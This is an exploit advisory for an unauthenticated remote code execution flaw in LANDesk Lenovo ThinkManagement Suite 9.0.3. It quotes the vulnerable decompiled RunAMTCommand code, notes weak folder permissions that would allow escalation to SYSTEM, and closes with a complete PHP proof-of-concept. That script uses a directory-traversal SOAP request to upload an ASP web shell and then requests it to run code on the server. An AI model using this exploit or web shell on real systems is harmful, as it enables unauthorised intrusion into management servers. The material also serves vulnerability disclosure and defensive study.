LANDesk Lenovo ThinkManagement Suite 9.0.3 Code Execution

Credit: retrogod
Risk: High
Local: No
Remote: Yes

LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server AMTConfig.Business.dll RunAMTCommand Remote Code Execution Vulnerability Tested against: Microsoft Windows Server 2003 r2 sp2 Software home page: Download url: Files tested: ThinkManagement9.0.2.exe LD90-SP2-MCP_CONS-2011-0428.exe LD90-SP2-MCP_SD-2011-0428.exe Instrunctions were to install 9.0.2, then apply two patches, finally to install 9.0.3 Background: The mentioned product creates various virtual directories on IIS. Among them the 'core.anonymous' one inside the 'landesk' tree. Without prior authentication / authorization is possible to invoke the 'ServerSetup.asmx' web service which exposes various functions inside the underlying dlls. Vulnerability: By specifying the 'RunAMTCommand' operation is possible to create arbitrary files inside public virtual directories. This operation supports five arguments: when the 'Command' argument is set ex. to '-PutUpdateFileCore', 'Data2' and 'Data3' are used for file creation. The first one suffers of a directory traversal vulnerability. You are in control of the path, extension and content of the newly created file. Then you can execute arbitrary code by invoking this file. Vulnerable code: C:\Program Files\LANDesk\ManagementSuite\LANDesk\ManagementSuite\Core\core.anonymous\ServerSetup.asmx ... <%@ WebService Language="c#" Codebehind="ServerSetup.asmx.cs" Class="ServerSetup.ServerSetup" %> ... Now look RunAMTCommand() inside ServerSetup.dll : ... [WebMethod] public int RunAMTCommand(string Command, string Data1, string Data2, string Data3, ref string ReturnString) { return Convert.ToInt32(Business.RunAMTCommand(Command, Data1, Data2, Data3, ref ReturnString)); } ... Again, look RunAMTCommand() inside ServerSetup.Business.dll : ... public static int RunAMTCommand(string Command, string Data1, string Data2, string Data3, ref string ReturnString) { SSLog.Log("RunAMTCommand()", new object[0]); SSResult sSFailure = SSResult.SSFailure; try { int num = new DBAccessBusiness().AvProBusinessInterface(Command, Data1, Data2, Data3, ref ReturnString); //<------------- if (num == 0) { sSFailure = SSResult.SSOK; } else { SSLog.Log("ConfigureAMT - RunAMTCommand returned " + num.ToString(), new object[0]); sSFailure = SSResult.SSAMTConfigFailure; } } catch (Exception exception) { SSLog.Log("ConfigureAMT exception: " + exception.Message, new object[0]); sSFailure = SSResult.SSException; } SSLog.Log("ConfigureAMT returned " + Convert.ToInt32(sSFailure).ToString(), new object[0]); return Convert.ToInt32(sSFailure); } ... Finally AvProBusinessInterface() inside AMTConfig.Business.dll : public int AvProBusinessInterface(string Command, string Location, string Module, string Data, ref string ReturnString) { int exitCode = -1; try { RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() Command: " + Command, new object[0]); if (Command.Equals("-RunExe")) { RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - Did run: " + Module, new object[0]); } if (Command.Equals("-RunClientNotify")) { Process process = new Process(); if (process != null) { process.StartInfo.FileName = Path.Combine(LDMainPath, "ClientNotify.exe"); process.StartInfo.Arguments = Data; process.StartInfo.UseShellExecute = false; process.StartInfo.RedirectStandardOutput = true; process.StartInfo.CreateNoWindow = true; if (process.Start()) { RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - Sucessfully run: " + process.StartInfo.FileName, new object[0]); RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - Arguments: " + process.StartInfo.Arguments, new object[0]); exitCode = 0; Thread.Sleep(0); process.Close(); } else { RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - Sucessfully run: " + process.StartInfo.FileName, new object[0]); } } } if (Command.Equals("-RunGetAMTIDs")) { Process process2 = new Process(); if (process2 != null) { process2.StartInfo.FileName = Path.Combine(LDMainPath, "getamtid.exe"); process2.StartInfo.Arguments = Data; process2.StartInfo.UseShellExecute = false; process2.StartInfo.RedirectStandardOutput = true; process2.StartInfo.CreateNoWindow = true; process2.StartInfo.WorkingDirectory = LDMainPath; if (process2.Start()) { ReturnString = process2.StandardOutput.ReadToEnd(); process2.WaitForExit(); process2.Close(); RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - Sucessfully run: " + process2.StartInfo.FileName, new object[0]); RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - Arguments: " + process2.StartInfo.Arguments, new object[0]); exitCode = 0; Thread.Sleep(0); } else { RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - Unsucessfully run: " + process2.StartInfo.FileName, new object[0]); } } } if (Command.Equals("-UpdateAgentPresenceXML")) { StreamWriter writer = new StreamWriter(Path.Combine(LDMainPath, "AgentPresence.xml")); if (writer != null) { RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - UpdateAgentPresenceXML", new object[0]); writer.Write(Data); writer.Close(); } } if (Command.Equals("-PutUpdateFileCore")) { RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - PutUpdateFileCore", new object[0]); StreamWriter writer2 = new StreamWriter(Path.Combine(LDMainPath, Module)); //<------------------------- !!! if (writer2 != null) { writer2.Write(Data); //<------------------------- !!! writer2.Close(); Process process3 = new Process(); if (process3 != null) { process3.StartInfo.FileName = Path.Combine(LDMainPath, "AMTConfigExt.exe"); process3.StartInfo.Arguments = "-cmd massmanage -importfile \"" + LDMainPath + Module + "\""; process3.StartInfo.UseShellExecute = false; process3.StartInfo.RedirectStandardOutput = true; process3.StartInfo.CreateNoWindow = true; process3.StartInfo.WorkingDirectory = LDMainPath; if (process3.Start()) { ReturnString = process3.StandardOutput.ReadToEnd(); process3.WaitForExit(); process3.Close(); RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - Sucessfully run: " + process3.StartInfo.FileName, new object[0]); RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - Arguments: " + process3.StartInfo.Arguments, new object[0]); exitCode = 0; Thread.Sleep(0); } else { RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - Unsucessfully run: " + process3.StartInfo.FileName, new object[0]); } } } } if (Command.Equals("-ProvisionOnly")) { string str; string str2; string str3; RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - ProvisionOnly", new object[0]); exitCode = this.ParseCSVData(Data, out str, out str2, out str3); if (exitCode == 0) { exitCode = this.ProvisionAMT(str, str2, str3); ReturnString = exitCode.ToString(); } } if (Command.Equals("-RunEnhancedRemediation")) { RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - RunEnhancedRemediation", new object[0]); if (-1 != Module.IndexOf("CircuitBreakerConfig.exe", StringComparison.CurrentCultureIgnoreCase)) { Process process4 = new Process(); if (process4 != null) { process4.StartInfo.FileName = Path.Combine(LDMainPath, Module); process4.StartInfo.Arguments = Data; process4.StartInfo.UseShellExecute = false; process4.StartInfo.RedirectStandardOutput = true; process4.StartInfo.CreateNoWindow = true; process4.StartInfo.WorkingDirectory = LDMainPath; if (process4.Start()) { ReturnString = process4.StandardOutput.ReadToEnd(); process4.WaitForExit(); exitCode = process4.ExitCode; process4.Close(); RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - Sucessfully run: " + process4.StartInfo.FileName, new object[0]); if (ReturnString.ToLower().IndexOf("err") >= 0) { exitCode = -1; } else if (exitCode == 1) { exitCode = 0; } Thread.Sleep(0); } else { RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - Unsucessfully run: " + process4.StartInfo.FileName, new object[0]); } } } } if (Command.Equals("-RunMassCheckConfigurationForSingleMachine")) { RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - RunMassCheckConfigurationForSingleMachine", new object[0]); exitCode = this.Create_masscheckforconfigchanges_ProcessForSingleMachine(Data); } if (Command.Equals("-RunMassCheckConfiguration")) { RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - RunMassCheckConfiguration", new object[0]); exitCode = this.Create_masscheckforconfigchanges_Process(); } if ((Command.Equals("-RunMassPowerOn") || Command.Equals("-RunMassPowerOff")) || ((Command.Equals("-RunMassReboot") || Command.Equals("-RunMassRebootOrPowerOn")) || Command.Equals("-RunMassUpdateInventory"))) { RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - " + Command, new object[0]); StreamWriter writer3 = new StreamWriter(Path.Combine(LDMainPath, Module)); if (writer3 != null) { writer3.Write(Data); writer3.Close(); string str4 = string.Empty; if (Command.Equals("-RunMassPowerOn")) { str4 = "masspowerup"; } else if (Command.Equals("-RunMassPowerOff")) { str4 = "masspowerdown"; } else if (Command.Equals("-RunMassReboot")) { str4 = "massreboot"; } else if (Command.Equals("-RunMassRebootOrPowerOn")) { str4 = "massrebootPwrOn"; } else if (Command.Equals("-RunMassUpdateInventory")) { str4 = "massupdate"; } Process process5 = new Process(); if (process5 != null) { process5.StartInfo.FileName = Path.Combine(LDMainPath, "AMTConfigExt.exe"); process5.StartInfo.Arguments = "-cmd " + str4 + " -importfile \"" + LDMainPath + Module + "\""; process5.StartInfo.UseShellExecute = false; process5.StartInfo.RedirectStandardOutput = true; process5.StartInfo.CreateNoWindow = true; process5.StartInfo.WorkingDirectory = LDMainPath; if (process5.Start()) { ReturnString = process5.StandardOutput.ReadToEnd(); process5.WaitForExit(); process5.Close(); RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - Sucessfully run: " + process5.StartInfo.FileName, new object[0]); RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - Arguments: " + process5.StartInfo.Arguments, new object[0]); exitCode = 0; Thread.Sleep(0); } else { RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - Unsucessfully run: " + process5.StartInfo.FileName, new object[0]); } } } } } catch (Exception exception) { exitCode = -1; RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - Exception: " + exception.Message, new object[0]); } RollingTempLog.Log("AMTConfig.Business.AvProBusinessInterface() - rc: " + exitCode.ToString(), new object[0]); return exitCode; } *Various attacks* can be performed according to the command specified. I'm choosing -PutUpdateFileCore because it is easier to verify. As attachment, proof of concept code, written in php which executes arbitrary code with NETWORK SERVICE privilege. It could be possible also to execute arbitrary code with SYSTEM privileges because to the ManagementSuite folder were given unsecure permission, see, from the command line: C:\>cacls "C:\Program Files\LANDesk\ManagementSuite\" C:\Program Files\LANDesk\ManagementSuite SERVER\LANDesk Management Suite:R SERVER\LANDesk Management Suite:(OI)(CI)(IO)(special access:) GENERIC_READ GENERIC_EXECUTE SERVER\LANDesk Script Writers:R SERVER\LANDesk Script Writers:(OI)(CI)(IO)(special access:) GENERIC_READ GENERIC_EXECUTE SERVER\LANDesk Administrators:(OI)(CI)F BUILTIN\Administrators:(OI)(CI)F NT AUTHORITY\SYSTEM:(OI)(CI)F NT AUTHORITY\NETWORK SERVICE:(OI)(CI)F SERVER\ASPNET:(OI)(CI)F <--------------------------------- !!! SERVER\IWAM_SERVER:R SERVER\IWAM_SERVER:(OI)(CI)(IO)(special access:) GENERIC_READ GENERIC_EXECUTE SERVER\IUSR_SERVER:R SERVER\IUSR_SERVER:(OI)(CI)(IO)(special access:) GENERIC_READ GENERIC_EXECUTE NT AUTHORITY\Authenticated Users:R NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(special access:) GENERIC_READ GENERIC_EXECUTE Full privileges were given to the subfolders and files to the ASPNET user, so an attacker may replace binary and dlls. At the next computer startup the ThinkManagement services will load the malicious code. At the time of this report, a second exploit is in stage of development. POC: <?php /* LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server AMTConfig.Business.dll RunAMTCommand Remote Code Execution Vulnerability */ error_reporting(E_ALL ^ E_NOTICE); set_time_limit(0); $err[0] = "[!] This script is intended to be launched from the cli!"; $err[1] = "[!] You need the curl extesion loaded!"; if (php_sapi_name() <> "cli") { die($err[0]); } function syntax() { print("usage: php 9sg_landesk.php [ip_address]\r\n" ); die(); } $argv[1] ? print("[*] Attacking...\n") : syntax(); if (!extension_loaded('curl')) { $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false; if ($win) { !dl("php_curl.dll") ? die($err[1]) : print("[*] curl loaded\n"); } else { !dl("") ? die($err[1]) : print("[*] curl loaded\n"); } } function _s($url, $is_post, $ck, $request) { global $_use_proxy, $proxy_host, $proxy_port; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); if ($is_post) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $request); } curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, array( "Cookie: ".$ck , "Content-Type: text/xml; charset=utf-8", "SOAPAction: \"\"" )); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, ""); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_TIMEOUT, 15); if ($_use_proxy) { curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port); } $_d = curl_exec($ch); if (curl_errno($ch)) { //die("[!] ".curl_error($ch)."\n"); } else { curl_close($ch); } return $_d; } $host = $argv[1]; $port = 80; $shell="<%\r\n". "Dim WshShell, oExec\r\n". "Set WshShell = CreateObject(\"WScript.Shell\")\r\n". "Set oExec = WshShell.Exec(\"calc\")\r\n". "%>\r\n"; $soap='<?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="" xmlns:xsd="" xmlns:soap=""> <soap:Body> <RunAMTCommand xmlns=""> <Command>-PutUpdateFileCore</Command> <Data1>aaaa</Data1> <Data2>upl\suntzu.asp</Data2> <Data3>'.htmlentities($shell).'</Data3> <ReturnString>bbbb</ReturnString> </RunAMTCommand> </soap:Body> </soap:Envelope>'; $url = "http://$host:$port/landesk/managementsuite/core/core.anonymous/ServerSetup.asmx"; $out = _s($url, 1, "", $soap); print($out."\n"); sleep(2); $url = "http://$host:$port/upl/suntzu.asp"; $out = _s($url, 0, "", ""); print($out."\n"); print("[*] Now look for calc.exe sub-process..."); ?>


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